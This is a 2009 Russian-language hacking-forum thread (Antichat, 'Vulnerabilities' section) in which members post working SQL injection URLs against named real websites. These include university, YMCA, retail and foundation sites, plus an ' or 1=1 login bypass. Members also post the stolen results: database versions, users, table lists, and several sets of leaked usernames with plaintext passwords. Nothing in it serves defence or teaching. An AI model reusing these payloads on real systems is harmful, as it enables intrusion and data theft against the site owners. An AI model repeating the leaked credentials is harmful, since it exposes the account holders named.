HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.05.2009, 20:55
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
С нами: 10333826

Репутация: 369


По умолчанию

http://www.alternativegrounds.com/show.php?ID=-20+union+select+1,2,3,4,5,6,7,8,9--
Page Rank: 4
Database Version: 4.0.18-Max
Database name: alternativegro
User name: alternativegro@www6.inetwave.com
PS ниодной таблы ненашел
 
Ответить с цитированием

  #2  
Старый 23.05.2009, 03:40
Rav1n
Познающий
Регистрация: 05.11.2008
Сообщений: 92
С нами: 9217595

Репутация: 149
По умолчанию

Код:
http://www.ifesworld.org/news/item.php?itemID=-1523+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
5.0.77-community-log:xnjafc_ifesworld:xnjafc_ifesworld@localhost

таблы:
Код:
http://www.ifesworld.org/news/item.php?itemID=-1523+union+select+1,2,3,4,5,6,7,8,9,10,cast(group_concat(table_name)+as+binary),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+information_schema.tables--
_______

Код:
http://www.latrobe.edu.au/lupa/news-item.php?id=-30+union+select+1,2,concat_ws(0x3a,version(),database(),user())--
4.1.22-log:lupa:lupa@web.latrobe.edu.au
______

Код:
http://www.indstate.edu/news/news.php?newsid=-1785+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--
5.0.45-community-nt-log:news:news@localhost

таблы:
Код:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,audiovideoarea,audiovideoaudience,audiovideoitem,dummy,experts_guide,memberaccess,newsarea,newsaudience,newslogin,newsmediaitem,newsmediatype,newspriority,newsstory,newsstoryarea,newsstoryaudience,newsstorymediaitem,photoarea,photoaudience,photoitem,presidentsearch,searchaudience,searchcomments,searchlogin,audiovideoarea,audiovideoaudience,audiovideoitem,dummy,experts_guide,memberaccess,newsarea,newsaudience,newslogin,newsmediaitem,newsmediatype,newspriority,newsstory,newsstoryarea,newsstoryaudience,newsstorymediaitem,photoarea,photoaudience,photoitem,presidentsearch,searchaudience,searchcomments,searchlogin
чуть-чуть акков (ID,username,password)
Код:
1:wherndon:Chuck1,
2:mlowry:camaroheaven,
3:jhiddle:dragon832,
4:dtaylor:rutabaga,
5:cdukate:patch03,
15:tford:cm1vp2,
7:pmeyer:cams2quik4u,
8:kspanuello:specialk,
31:sadla1:karuna,
25:tcampbell:nikond2x,
26:kberchem:Kosmo15,
30:jsicking:js8629
 
Ответить с цитированием

  #3  
Старый 23.05.2009, 11:49
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://www.invivogen.com/family.php?ID=-97+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),database(),version()),16,17--
visiteur@localhost:invivo:4.1.22
 
Ответить с цитированием

  #4  
Старый 23.05.2009, 13:56
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://www.bentel.ro/produse.php?idSubcategorie=3246&idProdus=-39409+union+select+concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),2


Database Version: 5.0.45
Database name: bentelsite
User name: bentelsite@localhost
Os:redhat-linux-gnu
 
Ответить с цитированием

  #5  
Старый 23.05.2009, 14:12
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

PR 1
Цитата:
http://pirotex.ru/content.php?id=-23'+union+select+version()+from+news/*'
Вывод в <title> 4й ветка бд. таблицы ни одной не нашел
логин -1' or 1=1/*'
пас любой



jokester: ethaicd.com БОЯН, не нужно восстанавливать то, что я стираю

Последний раз редактировалось jokester; 23.05.2009 в 16:58.. Причина: ethaicd.com БОЯН
 
Ответить с цитированием

  #6  
Старый 23.05.2009, 14:33
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://www.calcatinge.ro/index.php?idCategorie=47+UNION+SELECT+AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er(),@@version_compile_os),0x71),0x71),2--%20&lang=ro

Database Version: 5.0.77
Database name: calcat_calcatinge
User name: calcat_root@localhost
Os: portbld-freebsd6.2
 
Ответить с цитированием

  #7  
Старый 23.05.2009, 14:49
erihtoney
Познающий
Регистрация: 03.03.2009
Сообщений: 86
С нами: 9047791

Репутация: 258
По умолчанию

Цитата:
http://www.mintakafoundation.org/projet.php?id=-1+union+select+1,2,concat_ws(0x20,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
version 5.0.67-log
user mintakaDB@imu139.infomaniak.ch
database mintakafoundationorg
 
Ответить с цитированием

  #8  
Старый 23.05.2009, 16:37
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

PR 3

Код:
http://www.globus.naztrans.ru/CityInfo.php?Number=-9600+union+select+concat_ws(0x202d20,version(),user(),database(),@@version_compile_os),2,3,4,5
user() - karalex_georg@localhost
version() - 5.0.67-community
database() - karalex_globus
os - redhat-linux-gnu


В бд ничего интересного...
Список автомобилей, фото иды, коменты, новости.

cities
authors
gallereies
news
pages
photos
results
usercoments
video
etc...

Последний раз редактировалось Krist_ALL; 23.05.2009 в 16:41..
 
Ответить с цитированием

  #9  
Старый 23.05.2009, 17:08
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://www.mysupermarket.ro/produse.php?pID=227+union+select+1,2,3,4,concat_ws (0x3a,version(),database(),user(),@@version_compil e_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ limit+1,1

Database Version: 5.0.27
Database name: db_mysupermarketro
User name: mysupermarketro@localhost
Os: redhat-linux-gnu



http://www.mysupermarket.ro/produse.php?pID=227+UNION+SELECT+1,2,3,4,(SELECT+C ONCAT_ws(0x3a,aUsername,aPassword,aemail)+FROM+db_ mysupermarketro.Account+LIMIT+x,1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+li mit+1,1
 
Ответить с цитированием

  #10  
Старый 23.05.2009, 17:20
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

ПР4
http://www.sault.ymca.ca/content.php?ID=-65+union+select+1,2,3,4,5,concat_ws(0x3a3a,admin_u ser_type,admin_user_workflow,admin_username,admin_ password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+fro m+Admin_Users+/*+
1::1::ymca_2008::ymca_fitness
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.